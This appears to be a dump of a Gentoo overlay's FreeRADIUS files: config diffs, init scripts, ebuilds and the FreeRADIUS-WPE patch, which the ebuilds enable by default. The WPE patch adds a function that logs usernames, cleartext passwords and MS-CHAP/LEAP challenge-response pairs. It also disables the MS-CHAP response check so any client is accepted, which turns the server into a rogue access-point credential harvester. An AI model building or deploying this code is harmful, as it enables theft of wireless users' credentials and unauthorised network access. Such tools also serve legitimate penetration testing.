! # Lifetime of the cached entries, in hours.
! # The sessions will be deleted after this
! # time.
! #
! lifetime = 24 # hours
!
! #
! # The maximum number of entries in the
! # cache. Set to "0" for "infinite".
! #
! # This could be set to the number of users
! # who are logged in... which can be a LOT.
! #
! max_entries = 255
! }
! }
!
! # The TTLS module implements the EAP-TTLS protocol,
! # which can be described as EAP inside of Diameter,
! # inside of TLS, inside of EAP, inside of RADIUS...
! #
! # Surprisingly, it works quite well.
! #
! # The TTLS module needs the TLS module to be installed
! # and configured, in order to use the TLS tunnel
! # inside of the EAP packet. You will still need to
! # configure the TLS module, even if you do not want
! # to deploy EAP-TLS in your network. Users will not
! # be able to request EAP-TLS, as it requires them to
! # have a client certificate. EAP-TTLS does not
! # require a client certificate.
! #
! # You can make TTLS require a client cert by setting
! #
! # EAP-TLS-Require-Client-Cert = Yes
! #
! # in the control items for a request.
! #
ttls {
- # The tunneled EAP session needs a default
- # EAP type which is separate from the one for
- # the non-tunneled EAP module. Inside of the
- # TTLS tunnel, we recommend using EAP-MD5.
- # If the request does not contain an EAP
- # conversation, then this configuration entry
- # is ignored.
- default_eap_type = md5
-
- # The tunneled authentication request does
- # not usually contain useful attributes
- # like 'Calling-Station-Id', etc. These
- # attributes are outside of the tunnel,
- # and normally unavailable to the tunneled
- # authentication request.
- #
- # By setting this configuration entry to
- # 'yes', any attribute which NOT in the
- # tunneled authentication request, but
- # which IS available outside of the tunnel,
- # is copied to the tunneled request.
- #
- # allowed values: {no, yes}
- copy_request_to_tunnel = no
-
- # The reply attributes sent to the NAS are
- # usually based on the name of the user
- # 'outside' of the tunnel (usually
- # 'anonymous'). If you want to send the
- # reply attributes based on the user name
- # inside of the tunnel, then set this
- # configuration entry to 'yes', and the reply
- # to the NAS will be taken from the reply to
- # the tunneled request.
- #
- # allowed values: {no, yes}
- use_tunneled_reply = no
-
- #
- # The inner tunneled request can be sent
- # through a virtual server constructed
- # specifically for this purpose.
- #
- # If this entry is commented out, the inner
- # tunneled request will be sent through
- # the virtual server that processed the
- # outer requests.
- #
- virtual_server = "inner-tunnel"
-
- # This has the same meaning as the
- # same field in the "tls" module, above.
- # The default value here is "yes".
- # include_length = yes
}
!
! ##################################################
! #
! # !!!!! WARNINGS for Windows compatibility !!!!!
! #
! ##################################################
! #
! # If you see the server send an Access-Challenge,
! # and the client never sends another Access-Request,
! # then
! #
! # STOP!
! #
! # The server certificate has to have special OID's
! # in it, or else the Microsoft clients will silently
! # fail. See the "scripts/xpextensions" file for
! # details, and the following page:
! #
! # http://support.microsoft.com/kb/814394/en-us
! #
! # For additional Windows XP SP2 issues, see:
! #
! # http://support.microsoft.com/kb/885453/en-us
! #
! # Note that we do not necessarily agree with their
! # explanation... but the fix does appear to work.
! #
! ##################################################
!
! #
! # The tunneled EAP session needs a default EAP type
! # which is separate from the one for the non-tunneled
! # EAP module. Inside of the TLS/PEAP tunnel, we
! # recommend using EAP-MS-CHAPv2.
! #
! # The PEAP module needs the TLS module to be installed
! # and configured, in order to use the TLS tunnel
! # inside of the EAP packet. You will still need to
! # configure the TLS module, even if you do not want
! # to deploy EAP-TLS in your network. Users will not
! # be able to request EAP-TLS, as it requires them to
! # have a client certificate. EAP-PEAP does not
! # require a client certificate.
! #
! #
! # You can make PEAP require a client cert by setting
! #
! # EAP-TLS-Require-Client-Cert = Yes
! #
! # in the control items for a request.
! #
! peap {
! # The tunneled EAP session needs a default
! # EAP type which is separate from the one for
! # the non-tunneled EAP module. Inside of the
! # PEAP tunnel, we recommend using MS-CHAPv2,
! # as that is the default type supported by
! # Windows clients.
default_eap_type = mschapv2
!
! # the PEAP module also has these configuration
! # items, which are the same as for TTLS.
! copy_request_to_tunnel = no
! use_tunneled_reply = no
!
! # When the tunneled session is proxied, the
! # home server may not understand EAP-MSCHAP-V2.
! # Set this entry to "no" to proxy the tunneled
! # EAP-MSCHAP-V2 as normal MSCHAPv2.
! # proxy_tunneled_request_as_eap = yes
!
! #
! # The inner tunneled request can be sent
! # through a virtual server constructed
! # specifically for this purpose.
! #
! # If this entry is commented out, the inner
! # tunneled request will be sent through
! # the virtual server that processed the
! # outer requests.
! #
! virtual_server = "inner-tunnel"
}
-
- #
- # This takes no configuration.
- #
- # Note that it is the EAP MS-CHAPv2 sub-module, not
- # the main 'mschap' module.
- #
- # Note also that in order for this sub-module to work,
- # the main 'mschap' module MUST ALSO be configured.
- #
- # This module is the *Microsoft* implementation of MS-CHAPv2
- # in EAP. There is another (incompatible) implementation
- # of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
- # currently support.
- #
mschapv2 {
}
}
--- 1,33 ----
eap {
! default_eap_type = peap
timer_expire = 60
ignore_unknown_eap_types = no
! cisco_accounting_username_bug = yes
md5 {
}
leap {
}
gtc {
auth_type = PAP
}
tls {
private_key_password = whatever
! private_key_file = ${raddbdir}/certs/server.pem
! certificate_file = ${raddbdir}/certs/server.pem
! CA_file = ${raddbdir}/certs/ca.pem
! dh_file = ${raddbdir}/certs/dh
! random_file = ${raddbdir}/certs/random
! fragment_size = 1024
! include_length = yes
! }
ttls {
}
! peap {
default_eap_type = mschapv2
! #copy_request_to_tunnel = no
! #use_tunneled_reply = no
! #proxy_tunneled_request_as_eap = yes
}
mschapv2 {
}
}
diff -crB freeradius-server-2.1.7/raddb/radiusd.conf.in freeradius-server-2.1.7-wpe/raddb/radiusd.conf.in
*** freeradius-server-2.1.7/raddb/radiusd.conf.in Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/raddb/radiusd.conf.in Thu Nov 12 00:19:52 2009
***************
*** 466,472 ****
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
!
# SECURITY CONFIGURATION
#
# There may be multiple methods of attacking on the server. This
--- 466,472 ----
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
! wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
# There may be multiple methods of attacking on the server. This
diff -crB freeradius-server-2.1.7/src/include/radiusd.h freeradius-server-2.1.7-wpe/src/include/radiusd.h
*** freeradius-server-2.1.7/src/include/radiusd.h Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/include/radiusd.h Thu Nov 12 00:18:30 2009
***************
*** 361,366 ****
--- 361,367 ----
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -crB freeradius-server-2.1.7/src/main/auth.c freeradius-server-2.1.7-wpe/src/main/auth.c
*** freeradius-server-2.1.7/src/main/auth.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/main/auth.c Thu Nov 12 00:18:30 2009
***************
*** 339,344 ****
--- 339,345 ----
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -crB freeradius-server-2.1.7/src/main/log.c freeradius-server-2.1.7-wpe/src/main/log.c
*** freeradius-server-2.1.7/src/main/log.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/main/log.c Thu Nov 12 00:18:30 2009
***************
*** 28,33 ****
--- 28,36 ----
#include <freeradius-devel/radiusd.h>
+ #include <stdio.h>
+ #include <time.h>
+
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
#endif
***************
*** 258,263 ****
--- 261,314 ----
return r;
}
+ void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+ }
+
/*
* Dump a whole list of attributes to DEBUG2
diff -crB freeradius-server-2.1.7/src/main/mainconfig.c freeradius-server-2.1.7-wpe/src/main/mainconfig.c
*** freeradius-server-2.1.7/src/main/mainconfig.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/main/mainconfig.c Thu Nov 12 00:18:30 2009
***************
*** 228,234 ****
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
!
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
--- 228,234 ----
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
! { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -crB freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
*** freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c Thu Nov 12 00:18:30 2009
***************
*** 244,254 ****
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! leap_session_t *session)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
!
/*
* No password or previous packet. Die.
--- 244,254 ----
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
! unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
***************
*** 266,271 ****
--- 266,272 ----
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
***************
*** 416,421 ****
--- 417,424 ----
*/
for (i = 0; i < reply->count; i++) {
reply->challenge[i] = fr_rand();
+ /* WPE - Fixed challenge */
+ // reply->challenge[i] = 0;
}
DEBUG2(" rlm_eap_leap: Issuing AP Challenge");
diff -crB freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
*** freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h Thu Nov 12 00:18:30 2009
***************
*** 68,74 ****
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! leap_session_t *session);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
--- 68,74 ----
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -crB freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
*** freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c Thu Nov 12 00:18:30 2009
***************
*** 133,139 ****
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
! rcode = eapleap_stage4(packet, password, session);
session->stage = 6;
/*
--- 133,140 ----
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
! //rcode = eapleap_stage4(packet, password, session);
! rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -crB freeradius-server-2.1.7/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.7-wpe/src/modules/rlm_mschap/rlm_mschap.c
*** freeradius-server-2.1.7/src/modules/rlm_mschap/rlm_mschap.c Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_mschap/rlm_mschap.c Thu Nov 12 00:18:30 2009
***************
*** 736,745 ****
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
! uint8_t *nthashhash, int do_ntlm_auth)
{
uint8_t calculated[24];
/*
* Do normal authentication.
*/
--- 736,747 ----
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
! uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
+
/*
* Do normal authentication.
*/
***************
*** 753,761 ****
--- 755,765 ----
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE FTW
if (memcmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
***************
*** 1188,1194 ****
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
! do_ntlm_auth) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
mschap_add_reply(request, &request->reply->vps,
*response->vp_octets,
--- 1192,1198 ----
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
! do_ntlm_auth, username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
mschap_add_reply(request, &request->reply->vps,
*response->vp_octets,
***************
*** 1268,1274 ****
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
! do_ntlm_auth) < 0) {
RDEBUG2("FAILED: MS-CHAP2-Response is incorrect");
mschap_add_reply(request, &request->reply->vps,
*response->vp_octets,
--- 1272,1278 ----
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
! do_ntlm_auth, username_string) < 0) {
RDEBUG2("FAILED: MS-CHAP2-Response is incorrect");
mschap_add_reply(request, &request->reply->vps,
*response->vp_octets,


@ -1,11 +0,0 @@
--- freeradius-server-2.1.11.orig/src/modules/rlm_eap/types/rlm_eap_tls/rlm_eap_tls.c 2011-06-20 16:57:14.000000000 +0200
+++ freeradius-server-2.1.11/src/modules/rlm_eap/types/rlm_eap_tls/rlm_eap_tls.c 2012-09-11 13:55:45.000000000 +0200
@@ -484,7 +484,7 @@
*/
buf[0] = '\0';
asn_time = X509_get_notAfter(client_cert);
- if ((lookup <= 1) && asn_time && (asn_time->length < MAX_STRING_LEN)) {
+ if ((lookup <= 1) && asn_time && (asn_time->length < sizeof(buf))) {
memcpy(buf, (char*) asn_time->data, asn_time->length);
buf[asn_time->length] = '\0';
pairadd(&handler->certs,


@ -0,0 +1,12 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""
# Change this value if you change it in /etc/raddb/radiusd.conf
pidfile=/var/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
# RADIUSD_USER=radius
# RADIUSD_GROUP=radius


@ -0,0 +1,29 @@
#!/sbin/runscript
# Copyright 1999-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/files/radius.init-r3,v 1.2 2012/10/22 02:58:59 flameeyes Exp $
command=/usr/sbin/radiusd
command_args="${RADIUSD_OPTS}"
pidfile="${pidfile:-/var/run/radiusd/radiusd.pid}"
extra_started_commands="reload"
depend() {
use dns
}
start_pre() {
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /var/log/radius
}
reload() {
ebegin "Reloading radiusd"
kill -HUP $(cat /var/run/radiusd/radiusd.pid)
eend $?
}
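Review bot: reload() reads the PID from the hard-coded `/var/run/radiusd/radiusd.pid`, while the rest of the script honours an overridable `pidfile`, so a site that changes the pidfile gets a reload that signals nothing or a stale PID. Use `kill -HUP $(cat "${pidfile}")` there. In start_pre the `$(dirname ${pidfile})` expansion is unquoted. checkpath also falls back to `root:root` with mode 0750 when RADIUSD_USER/RADIUSD_GROUP are unset; if the daemon is meant to drop to an unprivileged account, that default would re-own /var/log/radius on every start, so the intended owner is worth stating in a comment.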


@ -1,156 +0,0 @@
# Copyright 1999-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.1.11.ebuild,v 1.3 2011/10/13 12:16:12 nativemad Exp $
EAPI="4"
inherit eutils multilib pam autotools libtool
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="ftp://ftp.freeradius.org/pub/radius/${PN}-server-${PV}.tar.gz"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="~amd64 ~ppc ~ppc64 ~sparc x86"
LICENSE="GPL-2"
SLOT="0"
IUSE="bindist debug edirectory firebird frascend frxp kerberos ldap mysql pam postgres snmp ssl threads +udpfromto +wpe"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
>=sys-libs/db-3.2
sys-libs/gdbm
sys-libs/readline
net-libs/libpcap
dev-lang/perl
snmp? ( net-analyzer/net-snmp )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-server )
!bindist? ( firebird? ( dev-db/firebird ) )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
frxp? ( dev-lang/python )"
DEPEND="${RDEPEND}"
REQUIRED_USE="frxp? ( threads )"
S="${WORKDIR}/${PN}-server-${PV}"
pkg_setup() {
if use edirectory && ! use ldap ; then
eerror "Cannot add integration with Novell's eDirectory without having LDAP support!"
eerror "Either you select ldap USE flag or remove edirectory"
die "edirectory needs ldap"
fi
enewgroup radiusd
enewuser radiusd -1 -1 /var/log/radius radiusd
}
src_prepare() {
epatch "${FILESDIR}/${PN}-2.1.10-versionless-la-files.patch"
epatch "${FILESDIR}/${PN}-2.1.10-ssl.patch"
epatch "${FILESDIR}/${PN}-2.1.10-qafixes.patch"
epatch "${FILESDIR}/${PN}-2.1.10-pkglibdir.patch"
if use wpe; then epatch "${FILESDIR}/${P}-wpe.patch"; fi
append-flags -lpthread
# kill modules we don't use
if ! use ssl; then
einfo "removing rlm_eap_{tls,ttls,ikev2,peap} modules (no use ssl)"
rm -rf src/modules/rlm_eap/types/rlm_eap_{tls,ttls,ikev2,peap}
fi
if ! use ldap; then
einfo "removing rlm_ldap (no use ldap)"
rm -rf src/modules/rlm_ldap
fi
if ! use kerberos; then
einfo "removing rlm_krb5 (no use kerberos)"
rm -rf src/modules/rlm_krb5
fi
if ! use pam; then
einfo "removing rlm_pam (no use pam)"
rm -rf src/modules/rlm_pam
fi
if ! use mysql; then
einfo "removing rlm_sql_mysql (no use mysql)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_mysql
sed -i -e '/rlm_sql_mysql/d' src/modules/rlm_sql/stable
fi
if ! use postgres; then
einfo "removing rlm_sql_postgresql (no use postgres)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_postgresql
sed -i -e '/rlm_sql_postgresql/d' src/modules/rlm_sql/stable
fi
if use bindist || ! use firebird; then
einfo "removing rlm_sql_firebird (use bindist or no use firebird)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_firebird
sed -i -e '/rlm_sql_firebird/d' src/modules/rlm_sql/stable
fi
if use wpe; then
# einfo "fixing wpe settings for windows"
# sed -i 's/^# with_ntdomain_hack = no/ with_ntdomain_hack = yes/g' raddb/modules/mschap
# sed -i 's/with_ntdomain_hack = no/with_ntdomain_hack = yes/g' raddb/modules/preprocess
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# These are needed for fixing libtool-2 related issues (#261189)
# Keep these lines even if you don't patch *.{in,am} files!
eautoreconf
elibtoolize
}
src_configure() {
local myconf="\
$(use_enable debug developer) \
$(use_with snmp) \
$(use_with frascend ascend-binary) \
$(use_with frxp experimental-modules) \
$(use_with udpfromto) \
$(use_with edirectory edir) \
$(use_with threads)"
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
econf --disable-static --disable-ltdl-install --with-system-libtool \
--localstatedir=/var ${myconf} || die "econf failed"
}
src_compile() {
emake -j1 || die "emake failed"
}
src_install() {
dodir /etc
dodir /var/log
dodir /var/run
diropts -m0750 -o root -g radiusd
dodir /etc/raddb
diropts -m0750 -o radiusd -g radiusd
dodir /var/log/radius
keepdir /var/log/radius/radacct
dodir /var/run/radiusd
diropts
emake R="${D}" install || die "make install failed"
sed -i -e 's:^#user *= *nobody:user = radiusd:;s:^#group *= *nobody:group = radiusd:' \
"${D}"/etc/raddb/radiusd.conf
chown -R root:radiusd "${D}"/etc/raddb/*
pamd_mimic_system radiusd auth account password session
mv "${D}/usr/share/doc/${PN}" "${D}/usr/share/doc/${PF}"
dodoc CREDITS
rm "${D}/usr/sbin/rc.radiusd"
newinitd "${FILESDIR}/radius.init-r1" radiusd
newconfd "${FILESDIR}/radius.conf" radiusd
cd "${D}"/etc/raddb/certs
emake all
}


@ -1,167 +0,0 @@
# Copyright 1999-2011 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.1.12.ebuild,v 1.1 2011/11/20 18:54:06 mrness Exp $
EAPI="4"
inherit eutils multilib pam autotools libtool
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="ftp://ftp.freeradius.org/pub/radius/${PN}-server-${PV}.tar.gz"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="~amd64 ~ppc ~ppc64 ~sparc ~x86"
LICENSE="GPL-2"
SLOT="0"
IUSE="bindist debug edirectory firebird frascend frxp kerberos ldap mysql pam postgres snmp ssl threads +udpfromto +wpe"
RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
>=sys-libs/db-3.2
sys-libs/gdbm
sys-libs/readline
net-libs/libpcap
dev-lang/perl
snmp? ( net-analyzer/net-snmp )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-server )
!bindist? ( firebird? ( dev-db/firebird ) )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
frxp? ( dev-lang/python )"
DEPEND="${RDEPEND}"
REQUIRED_USE="frxp? ( threads )"
S="${WORKDIR}/${PN}-server-${PV}"
pkg_setup() {
if use edirectory && ! use ldap ; then
eerror "Cannot add integration with Novell's eDirectory without having LDAP support!"
eerror "Either you select ldap USE flag or remove edirectory"
die "edirectory needs ldap"
fi
if has_version '<net-dialup/freeradius-2.1.12'; then
elog "Please remove radiusd group/user"
elog "New user/group is radius"
elog "please update /etc/raddb/radius.conf accordingly!"
fi
enewgroup radius
enewuser radius -1 -1 /var/log/radius radius
}
src_prepare() {
epatch "${FILESDIR}/${P}-versionless-la-files.patch"
epatch "${FILESDIR}/${P}-ssl.patch"
epatch "${FILESDIR}/${P}-qafixes.patch"
epatch "${FILESDIR}/${P}-pkglibdir.patch"
use wpe && epatch "${FILESDIR}/${PN}-2.1.11-wpe.patch"
append-flags -lpthread
# kill modules we don't use
if ! use ssl; then
einfo "removing rlm_eap_{tls,ttls,ikev2,peap} modules (no use ssl)"
rm -rf src/modules/rlm_eap/types/rlm_eap_{tls,ttls,ikev2,peap}
fi
if ! use ldap; then
einfo "removing rlm_ldap (no use ldap)"
rm -rf src/modules/rlm_ldap
fi
if ! use kerberos; then
einfo "removing rlm_krb5 (no use kerberos)"
rm -rf src/modules/rlm_krb5
fi
if ! use pam; then
einfo "removing rlm_pam (no use pam)"
rm -rf src/modules/rlm_pam
fi
if ! use mysql; then
einfo "removing rlm_sql_mysql (no use mysql)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_mysql
sed -i -e '/rlm_sql_mysql/d' src/modules/rlm_sql/stable
fi
if ! use postgres; then
einfo "removing rlm_sql_postgresql (no use postgres)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_postgresql
sed -i -e '/rlm_sql_postgresql/d' src/modules/rlm_sql/stable
fi
if use bindist || ! use firebird; then
einfo "removing rlm_sql_firebird (use bindist or no use firebird)"
rm -rf src/modules/rlm_sql/drivers/rlm_sql_firebird
sed -i -e '/rlm_sql_firebird/d' src/modules/rlm_sql/stable
fi
if use wpe; then
# einfo "fixing wpe settings for windows"
# sed -i 's/^# with_ntdomain_hack = no/ with_ntdomain_hack = yes/g' raddb/modules/mschap
# sed -i 's/with_ntdomain_hack = no/with_ntdomain_hack = yes/g' raddb/modules/preprocess
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# These are needed for fixing libtool-2 related issues (#261189)
# Keep these lines even if you don't patch *.{in,am} files!
eautoreconf
elibtoolize
}
src_configure() {
local myconf="\
$(use_enable debug developer) \
$(use_with snmp) \
$(use_with frascend ascend-binary) \
$(use_with frxp experimental-modules) \
$(use_with udpfromto) \
$(use_with edirectory edir) \
$(use_with threads)"
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
econf --disable-static --disable-ltdl-install --with-system-libtool \
--localstatedir=/var ${myconf}
}
src_compile() {
emake -j1
#cd raddb
#emake
}
src_install() {
dodir /etc
dodir /var/log
dodir /var/run
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
dodir /var/run/radiusd
diropts
emake R="${ED}" install
sed -i -e 's:^#user *= *nobody:user = radius:;s:^#group *= *nobody:group = radius:' \
"${ED}"/etc/raddb/radiusd.conf
chown -R root:radius "${ED}"/etc/raddb/*
pamd_mimic_system radius auth account password session
mv "${ED}/usr/share/doc/${PN}" "${ED}/usr/share/doc/${PF}"
dodoc CREDITS
rm "${ED}/usr/sbin/rc.radiusd"
newinitd "${FILESDIR}/radius.init-r2" radiusd
newconfd "${FILESDIR}/radius.conf" radiusd
cd "${ED}"/etc/raddb/certs
emake -j1 all
#cd raddb
#emake R=${ED} install
}


@ -0,0 +1,186 @@
# Copyright 1999-2012 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-dialup/freeradius/freeradius-2.2.0.ebuild,v 1.4 2012/10/03 10:29:49 ago Exp $
EAPI=4
PATCHSET=4
inherit eutils pam autotools user python
MY_P="${PN}-server-${PV}"
DESCRIPTION="Highly configurable free RADIUS server"
SRC_URI="ftp://ftp.freeradius.org/pub/radius/${MY_P}.tar.gz
ftp://ftp.freeradius.org/pub/radius/old/${MY_P}.tar.gz
http://dev.gentoo.org/~flameeyes/${PN}/${P}-patches-${PATCHSET}.tar.xz"
HOMEPAGE="http://www.freeradius.org/"
KEYWORDS="amd64 ~ppc ~ppc64 ~sparc x86"
LICENSE="GPL-2"
SLOT="0"
IUSE="bindist debug firebird kerberos ldap mysql
pam postgres ssl pcap readline ruby sqlite python odbc iodbc
oracle +wpe"
